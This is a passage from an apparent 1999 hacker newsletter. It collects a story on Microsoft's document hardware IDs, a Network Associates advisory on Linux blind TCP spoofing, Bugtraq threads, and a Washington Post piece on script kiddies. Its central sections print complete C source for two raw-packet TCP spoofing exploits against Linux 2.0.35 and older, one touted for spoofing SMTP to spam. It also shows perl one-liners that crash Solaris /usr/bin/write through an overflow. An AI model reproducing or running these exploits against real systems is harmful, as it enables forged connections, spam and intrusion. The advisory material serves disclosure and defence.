Smith said. It goes to show the ubiquity of the ID numbers, he said.
"Anyone writing applications can use them. [The privacy issue] is an
unintended side effect." The unique number can be easily traced to a person
by searching for the number in documents known to be created by that person,
according to Smith.
Unknown documents could also be associated with that person using the
identification number. "If you're in some really weird office-politics
situation -- who knows?" he said. He plans to explore whether other
Windows applications, such as software for creating Web pages, use the ID
numbers. He's also interested in the behavior of the company's Outlook email
software.
Smith said users can easily find their own network address, then search their
hard-disk content for documents containing the ID number to determine
where it is surreptitiously stored. Users can find the number by selecting
the Run command under the Windows Start menu and typing winipcfg to launch
the Windows IP configuration utility. One of the fields appearing in the
dialog box contains the user's "network adapter" address.
"All I did was have a search utility scan the hard disk for occurrences of
the Ethernet address," he said. Smith used one called Grep. "Anyone can do
that and see how common it is."
Certain types of text editors, known as hexadecimal editors, will reveal the
invisible code in any file. One example of the editor is HexEdit. Smith made
a related discovery when he found Microsoft was collecting the identification
number users entered when registering their new copies of the company's
Windows 98 operating system, prompting Microsoft to post an open letter to
its customers.
It said the company would publish software to remove the ID number from users'
Windows registry file, a move designed to prevent the behavior from occurring
in future documents. The company also said a subsequent update of Windows 98
would disable the software's registration feature so that the hardware ID would
not be collected "unless the user checks the option to send hardware information
to Microsoft." The company said it also plans to post a software tool on its Web
site that will allow users to delete hardware-registration information from
the Windows registry. But in a privacy advisory also issued Monday, a
privacy-watchdog group demanded that Microsoft go further.
"What I think is unprecedented here is that the problem is now on billions of
documents around the world. The problem remains out there even if Microsoft
fixed the applications," said Jason Catlett, president of Junkbusters.
"We demand they publish and publicize free software to protect these files --
and that's not something Microsoft in its open letter said it would do.
"[Users] really don't have an effective means of stopping [the problem] from
happening short of switching to [another software product like] Corel
WordPerfect," he said. Smith and privacy advocates worry that Microsoft
already has built up a database of registration numbers, although the company
said it plans to purge its own databases of any hardware-identification
information that may have been inadvertently gathered without customers'
consent.
Microsoft said it was confident "that the hardware information is not being
stored in our marketing databases, and we are investigating whether it is
stored in any database at all within Microsoft." Catlett believes an
independent auditor should oversee any such effort to purge the data, which
could have been transferred to backup systems or related databases.
"For me, the bottom line is Microsoft is getting information off of people's
computer [that] they have no business getting." Addressing that issue, he
said, "sounds like a patch to me." Catlett is disturbed by this wide-reaching
impact. Combined with Microsoft's push for required registration, a possibility
Catlett documented last week, he sees a quagmire for users trying to protect
themselves.
"If Microsoft starts compelling people to register, then its going to take a
lot of time for people to disentangle their lives from Microsoft's sticky
tentacles."
And From HNN March 12th:
contributed by spitfire
Are you worried about the Microsoft Global Unique Identifier? You know, that
number that is based on your MAC address, is embedded in all your documents
and is transmitted to Redmond whenever you visit the Microsoft web site or
register a product? Well Vector Development claims to have the solution,
Guideon.
Guideon claims to replace the GUID string with zeros or an optional string
you choose. <sounds interesting, I could think of some choice strings,
to replace the GUID with ... *grin* -Ed >
Vector Development http://www.vecdev.com/guideon.html
@HWA
05.0 Linux TCP flaw exploit code for Linux 2.0.35 and older.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* linux 2.0.35 and older
* tcp flaw exploit (discovered by network associates, october 1998)
* by scut (990310)
*
* description: linux does send the tcp data received in the SYN_RECEIVED
* state if a FIN packet is send
* affect: blind spoofing on linux systems with kernel version below 2.0.35
* useful for: SMTP spoofing (for the lamers to spam)
* FTP/Telnet spoofing
* for the lamers: no, you cannot spoof your mIRC with this
*
* for compilation you need libnet, a low level network library from route,
* go to http://www.infonexus.com/~daemon9/
* then try with:
*
* gcc -o lin35 lin35.c -lnet -D_BSD_SOURCE=1
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <libnet.h>
int
main(int argc, char **argv)
{
u_long dip = 0;
u_long sip = 0;
u_short dp = 0;
u_short sp = 0;
u_long seq;
u_char *buf, *fbuf;
int c, s, fp;
unsigned long int fs;
printf("lin35 - linux < 2.0.35 spoofer by sc!\n");
if (argc != 7) {
printf("usage: %s shost sport dhost dport delay file\n", argv[0]);
printf(" shost = source host (name or ip)\n");
printf(" sport = source port\n");
printf(" dhost = destination host\n");
printf(" dport = destination port\n");
printf(" delay = time to wait (in ms) between SYN and data and FIN\n");
printf(" file = filename to read data from\n");
exit(0);
}
sip = name_resolve(argv[1], 1);
sp = atoi(argv[2]);
dip = name_resolve(argv[3], 1);
dp = atoi(argv[4]);
fp = open(argv[6], O_RDONLY);
if (fp == -1) {
fprintf(stderr, "file not found\n");
exit(1);
}
fs = lseek(fp, 0, SEEK_END);
if (fs == -1) {
fprintf(stderr, "file end not found\n");
exit(1);
}
if (lseek(fp, 0, SEEK_SET) == -1) {
fprintf(stderr, "cannot reset offset\n");
exit(1);
}
printf("[35] data file: %s - file size: %u\n", argv[6], fs);
if (fs > (MAX_PACKET - (IP_H + TCP_H))) {
fprintf(stderr, "file too big, exiting\n");
exit(1);
}
fbuf = malloc(fs);
if (fbuf == NULL) {
fprintf(stderr, "cannot load file to mem\n");
exit(1);
}
c = read(fp, fbuf, fs);
if (c != fs) {
fprintf(stderr, "cannot read file\n");
exit(1);
}
buf = calloc(1, TCP_H + IP_H);
if (buf == NULL) {
fprintf(stderr, "no memory for packet\n");
exit(1);
}
s = open_raw_sock(IPPROTO_RAW);
if (s == -1) {
fprintf(stderr, "cannot open raw socket\n");
exit(1);
}
seq = get_prand(PRu32);
/* first initiate a connection */
printf("[35] opening connection, sending SYN\n");
build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP,
sip, dip, NULL, 0, buf);
build_tcp(sp, dp, seq, 0, TH_SYN, 16384, 0, NULL, 0, buf + IP_H);
do_checksum(buf, IPPROTO_TCP, TCP_H);
c = write_ip(s, buf, TCP_H + IP_H);
if (c < TCP_H + IP_H) {
fprintf(stderr, "send to less bytes\n");
exit(1);
}
/* now wait to let the connection establish */
usleep(atoi(argv[5]) * 1000);
/* then send data packet */
printf("[35] sending data packet (%u bytes of data)\n", fs);
buf = realloc(buf, TCP_H + IP_H + fs);
if (buf == NULL) {
fprintf(stderr, "memory\n");
exit(1);
}
build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP,
sip, dip, NULL, 0, buf);
build_tcp(sp, dp, seq + 1, 0, 0, 16384, 0, fbuf, fs, buf + IP_H);
do_checksum(buf, IPPROTO_TCP, TCP_H);
c = write_ip(s, buf, TCP_H + IP_H + fs);
if (c < (TCP_H + IP_H + fs)) {
fprintf(stderr, "send to less bytes (%d) for data packet\n", c);
exit(1);
}
/* now wait again */
usleep(atoi(argv[5]) * 1000);
/* and close the connection */
printf("[35] closing connection, sending FIN\n");
build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP,
sip, dip, NULL, 0, buf);
build_tcp(sp, dp, seq + 1 + fs, 0, TH_FIN, 16384, 0, NULL, 0, buf + IP_H);
do_checksum(buf, IPPROTO_TCP, TCP_H);
c = write_ip(s, buf, TCP_H + IP_H);
if (c < TCP_H + IP_H) {
fprintf(stderr, "send to less bytes\n");
exit(1);
}
printf("[35] successful\n");
free(fbuf);
free(buf);
return(0);
}
@HWA
05.1 TCP Blind Spoofing Exploit Code for Linux kernels 2.0.35< and Discussion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-=- receive.c and spoof.c exploit code
Hello,
Here is some demonstration code for the "Linux Blind TCP Spoofing" problem
discovered by Network Associates, Inc. If you have trouble compiling this,
try it with -D_BSD_SOURCE.
1.) receive.c
This simple program creates a TCP socket and waits for a connection.
After the accept call returnes, it reads 8 bytes from the socket and
prints them on stdout.
usage: receive listen_port
2.) spoof.c
This one sends a SYN packet, a Null packet (no flags at all) with 8 bytes
of data and a FIN packet to the target.
usage: spoof source_ip source_port target_ip target_port
Don't forget to disable host source_ip so it cannot send RST's. I've tested
this on Linux 2.0.30. After the FIN packet is received, the accept call
returnes and the read call gives the data sent with the Null packet.
!!This code is for educational purposes only!!
---------------------------- receive.c --------------------------
#include <stdio.h>
#include <errno.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
main(int argc, char *argv[])
{
int i,n,dummy,new;
struct sockaddr_in address,source_addr;
char buffer[8];
address.sin_family = AF_INET;
address.sin_port = htons(atoi(argv[1]));
address.sin_addr.s_addr = 0;
if((i=socket(AF_INET,SOCK_STREAM,6))<0) /*create socket*/
{
perror("socket\n");
exit(1);
}
if((bind(i,(struct sockaddr *)&address,sizeof(struct sockaddr_in)))<0)
{ /*bind socket to address*/
perror("bind");
exit(1);
}
if((listen(i,2))<0)
{
perror("listen");
exit(1);
}
printf("listening on socket\n");
new=accept(i,(struct sockaddr *)&source_addr,&dummy);
if(new>0)
printf("connected!\n");
else
{
perror("accept");
exit(1);
}
fflush(stdout);
n=read(new,buffer,8);
printf("read %i bytes from socket\n",n);
printf("message is: %s\n",buffer);
}
--------------------------------spoof.c---------------------------------
#include <stdio.h>
#include <netinet/ip.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <asm/types.h>
#define FIN 1
#define SYN 2
#define SEQ 20985
/*---------------Checksum calculation--------------------------------*/
unsigned short in_cksum(unsigned short *addr,int len)
{
register int nleft = len;
register unsigned short *w = addr;
register int sum = 0;
unsigned short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
/*----------------------------------------------------------------------*/
/*------------Send spoofed TCP packet-----------------------------------*/
int send_tcp(int sfd,unsigned int src,unsigned short src_p,
unsigned int dst,unsigned short dst_p,tcp_seq seq,tcp_seq ack,
u_char flags,char *buffer,int len)
{
struct iphdr ip_head;
struct tcphdr tcp_head;
struct sockaddr_in target;
char packet[2048]; /*the exploitation of this is left as an exercise..*/
int i;
struct tcp_pseudo /*the tcp pseudo header*/
{
__u32 src_addr;
__u32 dst_addr;
__u8 dummy;
__u8 proto;
__u16 length;
} pseudohead;
struct help_checksum /*struct for checksum calculation*/
{
struct tcp_pseudo pshd;
struct tcphdr tcphd;
char tcpdata[1024];
} tcp_chk_construct;
/*Prepare IP header*/
ip_head.ihl = 5; /*headerlength with no options*/
ip_head.version = 4;
ip_head.tos = 0;
ip_head.tot_len = htons(sizeof(struct iphdr)+sizeof(struct tcphdr)+len);
ip_head.id = htons(31337 + (rand()%100));
ip_head.frag_off = 0;
ip_head.ttl = 255;
ip_head.protocol = IPPROTO_TCP;
ip_head.check = 0; /*Fill in later*/
ip_head.saddr = src;
ip_head.daddr = dst;
ip_head.check = in_cksum((unsigned short *)&ip_head,sizeof(struct iphdr));
/*Prepare TCP header*/
tcp_head.th_sport = htons(src_p);
tcp_head.th_dport = htons(dst_p);
tcp_head.th_seq = htonl(seq);
tcp_head.th_ack = htonl(ack);
tcp_head.th_x2 = 0;
tcp_head.th_off = 5;
tcp_head.th_flags = flags;
tcp_head.th_win = htons(0x7c00);
tcp_head.th_sum = 0; /*Fill in later*/
tcp_head.th_urp = 0;
/*Assemble structure for checksum calculation and calculate checksum*/
pseudohead.src_addr=ip_head.saddr;
pseudohead.dst_addr=ip_head.daddr;
pseudohead.dummy=0;
pseudohead.proto=ip_head.protocol;
pseudohead.length=htons(sizeof(struct tcphdr)+len);
tcp_chk_construct.pshd=pseudohead;
tcp_chk_construct.tcphd=tcp_head;
memcpy(tcp_chk_construct.tcpdata,buffer,len);
tcp_head.th_sum=in_cksum((unsigned short *)&tcp_chk_construct,
sizeof(struct tcp_pseudo)+sizeof(struct tcphdr)+len);
/*Assemble packet*/
memcpy(packet,(char *)&ip_head,sizeof(ip_head));
memcpy(packet+sizeof(ip_head),(char *)&tcp_head,sizeof(tcp_head));
memcpy(packet+sizeof(ip_head)+sizeof(tcp_head),buffer,len);
/*Send packet*/
target.sin_family = AF_INET;
target.sin_addr.s_addr= ip_head.daddr;
target.sin_port = tcp_head.th_dport;
i=sendto(sfd,packet,sizeof(struct iphdr)+sizeof(struct tcphdr)+len,0,
(struct sockaddr *)&target,sizeof(struct sockaddr_in));
if(i<0)
return(-1); /*Error*/
else
return(i); /*Return number of bytes sent*/
}
/*---------------------------------------------------------------------*/
main(int argc, char *argv[])
{
int i;
unsigned int source,target;
unsigned short int s_port,d_port;
char data[]="abcdefg";
source=inet_addr(argv[1]);
s_port=atoi(argv[2]);
target=inet_addr(argv[3]);
d_port=atoi(argv[4]);
if((i=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) /*open sending socket*/
{
perror("socket");
exit(1);
}
send_tcp(i,source,s_port,target,d_port,SEQ,0,SYN,NULL,0);
printf("SYN sent\n");
usleep(1000);
send_tcp(i,source,s_port,target,d_port,SEQ+1,0,0,data,8); /*no flags set*/
printf("data sent\n");
usleep(1000);
send_tcp(i,source,s_port,target,d_port,SEQ+9,0,FIN,NULL,0);
printf("FIN sent\n");
close(i);
}
--
Jochen Bauer
Institute for Theoretical Physics
University of Stuttgart
Germany
PGP public key available from:
http://www.theo2.physik.uni-stuttgart.de/jtb.html
-=- further discussion;
Date: Tue, 9 Mar 1999 16:28:24 -0800
From: Security Research Labs <seclabs@NAI.COM>
To: BUGTRAQ@netspace.org
Subject: Linux Blind TCP Spoofing
[ The following text is in the "iso-8859-1" character set. ]
[ Your display is set for the "US-ASCII" character set. ]
[ Some characters may be displayed incorrectly. ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
======================================================================
=
Network Associates, Inc.
SECURITY ADVISORY
March 9, 1999
Linux Blind TCP Spoofing
======================================================================
=
SYNOPSIS
An implementation flaw in the Linux TCP/IP stack allows remote
attackers
to forge TCP connections without predicting sequence numbers and pass
data to the application layer before a connection is established.
======================================================================
=
VULNERABLE HOSTS
This problem is present in Linux kernels up to and including 2.0.35.
Any distribution containing a kernel revision less than this is
vulnerable.
======================================================================
=
DETAILS
TCP is a reliable connection-oriented protocol which requires the
completion of a three way handshake to establish a connection. To
implement reliable and unduplicated delivery of data, the TCP
protocol
uses a sequence based acknowledgment system. During connection
establishment each host selects an initial sequence number which is
sent in the first packet of the connection. Each subsequent byte
transmitted in the TCP connection is assigned a sequence number.
To prevent duplicate or invalid segments from impacting established
connections TCP utilizes a state based model. In a typical
client-server application, the client initiates a connection by
transmitting a TCP segment to a listening server process. This
causes the state of the process to move from the LISTEN state into
SYN_RECEIVE if a SYN flag is present. During this state the server
acknowledges the clients request setting both the SYN and ACK
flags. To complete the three way handshake the client acknowledges
the servers response, moving the server from SYN_RECEIVE to
ESTABLISHED state.
To establish a forged TCP session an attacker must have knowledge
of or be able to predict the initial sequence number that is selected
by the server. An implementation flaw in the Linux kernel allows
data to be delivered to the application layer before the handshake
has completed.
======================================================================
=
TECHNICAL DETAILS
The combination of three flaws in the Linux TCP/IP implementation
contribute to the existence of a security vulnerability. Firstly,
Linux only verifies the acknowledgment number of incoming segments
if the ACK flag has been set. Linux also queues data from TCP
segments without acknowledgment information prior to the
completion of the three way handshake but after the initial SYN
has been acknowledged by the server. Finally, Linux passes data to
the application layer upon the receipt of a packet containing the
FIN flag regardless of whether a connection has been established.
Together, these flaws allow an attacker to spoof an arbitrary
connection and deliver data to an application without the need to
predict the servers initial sequence number.
According to the standard, there is only one case wherein a correct
TCP/IP stack can accept data in a packet that does not have the ACK
flag set --- the initial connection-soliciting SYN packet can
contain data, but must not have the ACK flag set. In any other case,
a data packet not bearing the ACK flag should be discarded.
When a TCP segment carries an ACK flag, it must have a correct
acknowledgement sequence number (which is the sequence number of the
next byte of data expected from the other side of the connection).
TCP packets bearing the ACK flag are verified to ensure that their
acknowledgement numbers are correct.
Vulnerable Linux kernels accept data segments that do not have the
ACK flag set. Because the ACK flag is not set, the acknowledgement
sequence number is not verified. This allows an attacker to send
data over a spoofed connection without knowing the target's current
(or initial) sequence number.
Linux does not deliver data received from a TCP connection when the
connection is in SYN_RECEIVE state. Thus, an attacker cannot
successfully spoof a TCP transaction to a Linux host without somehow
completing the TCP handshake. However, an implementation flaw in
some Linux kernels allows an attacker to bypass the TCP handshake
entirely, by "prematurely" closing it with a FIN packet.
When a FIN packet is received for a connection in SYN_RECEIVE state,
Linux behaves as if the connection was in ESTABLISHED state and moves
the connection to CLOSE_WAIT state. In the process of doing this,
data queued on the connection will be delivered to listening
applications. If the ACK flag is not set on the FIN segment, the
target's sequence number is not verified in the segment.
======================================================================
=
RESOLUTION
It is recommended that kernels below version 2.0.36 be upgraded to
eliminate this vulnerability.
Updated kernel packages for Red Hat Linux which are not vulnerable to
this
problem are available from
http://www.redhat.com/support/docs/errata.html.
Both Debian and Caldera Linux have been contacted regarding this
vulnerability although no official response has been received.
The latest stable versions of the Linux kernel are available from
http://www.kernel.org.
======================================================================
=
CREDITS
Analysis and documentation of this problem was conducted by Anthony
Osborne with the Security Labs at Network Associates. This
vulnerability
was discovered on the October 5, 1998.
======================================================================
=
ABOUT THE NETWORK ASSOCIATES SECURITY LABS
The Security Labs at Network Associates hosts some of the most
important
research in computer security today. With over 30 published security
advisories published in the last 2 years, the Network Associates
security
auditing teams have been responsible for the discovery of many of the
Internet's most serious security flaws. This advisory represents our
ongoing commitment to provide critical information to the security
community.
For more information about the Security Labs at Network Associates,
see our website at http://www.nai.com or contact us at
<seclabs@nai.com>.
======================================================================
=
NETWORK ASSOCIATES SECURITY LABS PGP KEY
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 5.5.5
mQGiBDXGgDsRBADVOnID6BtEhKlm2cNalho28YP0JAh+J4iRUIaiWshzI0tc0KPc
fvs+0xYwiqjxmeHi2sdIEPQ7S+ltA3Dlp6/DFojWBr2XB9hfWy4uiKBUHqnsKYnB
Gpkh6nIx7DIwn+u0PXMXbJCG3LYf8daiPVdzC2VFtbRvJL4wZc6NLQViFQCg/9uS
DuH/0NE6mO8Cu4iVrUT5Wk8D/ArOpV5T5yIuXHZO1/ZBVeHccVVvHe8wHK4D9WUs
FsB8fgYLNgdFMMjtam7QQSBY/P1KKBzaFqZhkfS4WVMAFEy94NHXG+KTCPhXkZzp
OPPqwWqZgfvOg0Bm20O/GhzQkB6JfFJqcfR87Ej0+fcDKrTTxAELWHGS7c9Qdn6P
bfwHA/4oLNwYrtgWNkjGcG018Pu2jKT7YuP9zBTMu28IBiWdPLGL9Wle4d5cdDVx
Es4iVl8FMtxlgTWCgMnBLS4nyM3pCn1HF+8Gi+IVKUXWCkqt/rtBMsrOMfrOgEIu
BWnTZcTR7kcWtH7xDFNyZ47U4pElLXwATVDty/FczAJnpeht2LQyTmV0d29yayBB
c3NvY2lhdGVzIFNlY3VyaXR5IExhYnMgPHNlY2xhYnNAbmFpLmNvbT6JAEsEEBEC
AAsFAjXGgDsECwMCAQAKCRCheCy6j9WBEtgDAKDpYMwQZP0Ipx7X0ivnTxxJkA/W
vACg4LZv0lmWqmnd7XCe4OIJ05aT6hK5Ag0ENcaAOxAIAPZCV7cIfwgXcqK61qlC
8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh
01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscB
qtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFst
jvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISn
CnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVeky
CzsAAgIH/RZcJoRkhCf9O4Er+rciBNG3QqM3tek23oxGuVwqRxtGlGKuf+YaUDIA
vZhARftupZYJf/+AM9pyjjsF7ON/Df5oIXXhqzrDySw47dNB3I1FG7vwAUBRfYgG
NRP+zvf1nld+FgAXag1DIQteXYPtoMUJP8ZgvbELYVdZS2TapOHUv7r4rOY+UUjl
U+FkQPp9KCNreaNux4NxwT3tzXl1KqqkliC8sYxvMCkJ+JO71TKGplO9dXsf3O8p
2r33+LngmLs4O7inrUlmAUKq3jmCK50J7RsZjd6PlK/0JwcjFkOZeYrxTguZzCR4
QYmo8nEHqEMSKQci0VUf9KH4lHf6xmGJAEYEGBECAAYFAjXGgDsACgkQoXgsuo/V
gRK5LACgoAqLFk10kAMu6xb3ftO4+INJs14Ani+1hujlYRxYphN97c5ci8WtILNZ
=L3C6
- ----
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQA/AwUBNvLqq6F4LLqP1YESEQJH5QCg4FIv1+eRED+wYV5uMp2nVto/zHMAnjii
g3Q3t36ITPBKkdRCQGK4DCBe
=yLGh
-----END PGP SIGNATURE-----
--------------------------------------------------------------------------
Date: Wed, 10 Mar 1999 12:17:25 -0800
From: John D. Hardin <jhardin@WOLFENET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Linux Blind TCP Spoofing (fwd)
---------- Forwarded message ----------
Date: Wed, 10 Mar 1999 19:46:13 +0000 (GMT)
>From: Alan Cox <alan@lxorguk.ukuu.org.uk>
To: jhardin@WOLFENET.COM
Subject: Re: Linux Blind TCP Spoofing
> > It is recommended that kernels below version 2.0.36 be upgraded to
> > eliminate this vulnerability.
>
> This implies but does not explicitly state that 2.0.36+ kernels are
> not vulnerable. Is this the case?
NAI reported the problem to me during the 2.0.36 development period and
the bug was squashed.
@HWA
06.0 Solaris 2.6 x86 /usr/bin/write buffer overflow exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 8 Mar 1999 15:30:36 +0900
From: bugscan@KOSNET.NET
To: BUGTRAQ@netspace.org
Subject: Solaris "/usr/bin/write" bug
This is my first post to BugTraq
If this is old, I'm sorry.
when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something
interesting.
It's buffer overflow bug in "/usr/bin/write"
To ensure, view this command :
( Solaris 2.6 x86 )
[loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'`
[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxx permission denied
[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 98'`
Segmentation fault
( Solaris 2.5.1(2.5) sparc )
[love]/home/love> write loveyou `perl -e 'print "x" x 79'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
permission denied
[love]/home/love> write loveyou `perl -e 'print "x" x 80'`
Segmentation Fault
( Solaris 2.6 and 2.7 maybe .. )
bye bye ~ :)
----------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 17:16:26 +0000
From: John RIddoch <jr@SCMS.RGU.AC.UK>
Reply-To: John Riddoch <jr@master.scms.rgu.ac.uk>
To: BUGTRAQ@netspace.org
Subject: Re: Solaris "/usr/bin/write" bug
>when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found
something
> interesting.
>It's buffer overflow bug in "/usr/bin/write"
>To ensure, view this command :
>
>( Solaris 2.6 x86 )
>[loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'`
>[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'`
>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
>( Solaris 2.6 and 2.7 maybe .. )
This also segfaults under Solaris 2.6 and 7 on SPARC.
I'm not sure how exploitable this is, as it is only sgid tty, which isn't a
huge problem (but could be nonetheless, I suppose).
--
John Riddoch Email: jr@scms.rgu.ac.uk Telephone: (01224)262730
Room C4, School of Computer and Mathematical Science
Robert Gordon University, Aberdeen, AB25 1HG
I am Homer of Borg. Resistance is Fu... Ooooh! Donuts!
----------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 21:22:17 -0600
From: Chris Tobkin <tobkin@umn.edu>
To: BUGTRAQ@netspace.org
Subject: Re: Solaris "/usr/bin/write" bug
> ( Solaris 2.6 and 2.7 maybe .. )
(Solaris 2.7 x86)
[tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 93'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxx permission denied
[tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 94'`
Segmentation fault
(Solaris 2.6 sparc)
[tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 91'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxx permission denied
[tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 92'`
Segmentation fault
Looks like 2.6 for sparc and 2.7 intel have the same problem...
// chris
tobkin@umn.edu
*************************************************************************
Chris Tobkin tobkin@umn.edu
Java and Web Services - Academic and Distributed Computing Services - UMN
-----------------------------------------------------------------------
Laura: I took a business course at business college--
Jim: How did that work out?
Laura: Well, not very well...I had to drop out, it gave me...indigestion.
- Tennessee Williams - The Glass Menagerie
*************************************************************************
----------------------------------------------------------------------------------
Date: Tue, 9 Mar 1999 15:45:16 +0000
From: Dan - Sr. Admin <dm@GLOBALSERVE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Solaris "/usr/bin/write" bug
> This is my first post to BugTraq
> If this is old, I'm sorry.
> when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something
> interesting.
> It's buffer overflow bug in "/usr/bin/write"
> To ensure, view this command :
[snip]
> ( Solaris 2.6 and 2.7 maybe .. )
>
> bye bye ~ :)
Confirmed under Sparc Solaris 2.6.
Although I have no source code to verify this, I would assume the problem
lies in a sprintf() call (or something similiar) that builds the device to
open from the tty you specify on the command line.
However, even if this is overflowable into a shell with tty permissions,
I can see nothing useful coming out of it.
crw--w---- 1 dm tty 24, 0 Mar 9 14:39 pts@0:0
Those are the permissions on the terminal. The most I can see happening is
someone writing to my screen when I have messages turned off.
Regards,
--
Dan Moschuk (TFreak!dm@globalserve.net)
Senior Systems/Network Administrator
Globalserve Communications Inc., a Primus Canada Company
"Be different: conform."
@HWA
07.0 New Computer Technology Makes Hacking a Snap - Washington Post
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
FUD throughout this article on script kiddies, but still a good
entertaining read and worthy of your time ...
http://www.washingtonpost.com/wp-srv/WPcap/1999-03/10/024r-031099-idx.html
New Computer Technology Makes Hacking a Snap
By Michael E. Ruane
Washington Post Staff Writer
Wednesday, March 10, 1999; Page A01
Used to be you had to have some know-how to crash a kernel. It would
take all night to snoop a connection, smash a stack or crack a password.
You could work forever trying to get to root.
Not any more.
Nowadays, any fresh-faced newbie can download a kiddie script, fire off a
vulnerability scan and, in no time, come up with a nice, juicy target list.
It's enough to make veteran hackers -- the handful of computer wizards
who speak a colorful language that once was all their own -- break down
and cry.
But it's true. Along with the breathtaking advances in computer technology
has come a vast proliferation of easy, ready-to-use computer hacking
programs, freely available on the Internet, and a boon to greenhorn
hackers.
"This is your nephew or your cousin," says Peter Tippett, president of the
Reston-based International Computer Security Association. "It's a kid who
says, 'This seems kind of cool. Let me just take this tool and aim it at Ford
Motor Company.' "
They use programs -- called "exploits," "tools" or "attacks" -- with names
like "Smurf," "Teardrop" and "John the Ripper."
Some are so-called "denial of service" programs, which sneak or barge in
and overwhelm a targeted system, shutting it down. Others are
"vulnerability scanners," which search the Net for specific weaknesses to
be exploited later. Still others are "penetration" attacks that break in and
take control.
Some attacks use a "Trojan Horse" -- benign-looking bait with an exploit
concealed inside. Others "spoof," using a bogus ID. Still others lie in wait
and spring when an unsuspecting victim pauses to visit.
A few are simply sent out to "sniff the traffic" on the Internet.
There are hundreds of them. So many that some have been given the name
kiddie scripts, because of their simplicity of use. Those who launch them
are called, of course, script kiddies. And experts say they may account for
95 percent of all external computer hacking attacks.
Hacking always seems to have been the purview of the young. Just last
year, five teenagers hacked into Defense Department computers, and last
month, a 15-year-old from Vienna was accused of hacking into Clemson
University's system and of trying to break into NASA's.
Experts believe there are now tens of thousands of hacking-related Web
sites, and hundreds that approach the subject seriously. The Pentagon,
traditionally the most assailed hacking target on Earth, announced Friday
that it is investigating another potent attack -- one of the 80 to 100 it
undergoes every day.
But in years past, hacking was tedious, demanding work that required
brains and dedication, and, if successful, was an envied notch in the cyber
gun. There was hacker esprit. There was a great "signal-to-noise" ratio --
intelligent talk vs. baloney. And there was the hacker code: Look, but
don't touch.
No longer.
"It used to be a small circle," says Dr. Mudge, a veteran Boston-area
hacker who operates a Web site with his sidekicks Kingpin, Brian
Oblivion, SpaceRogue and others. "Now it's almost mainstream, and like
anything that goes mainstream you get a lot of good and a lot of bad."
"Now people can hack without having to pay their dues," says Rob Clyde,
a vice president with the Rockville-based computer security firm, Axent
Technologies Inc.
"You no longer have to be an expert," he says. "You just have to have time
and motive. And the motive often times now is vandalism, destruction, just
blow away stuff, destroy it, make it look bad."
Sometimes it's even worse.
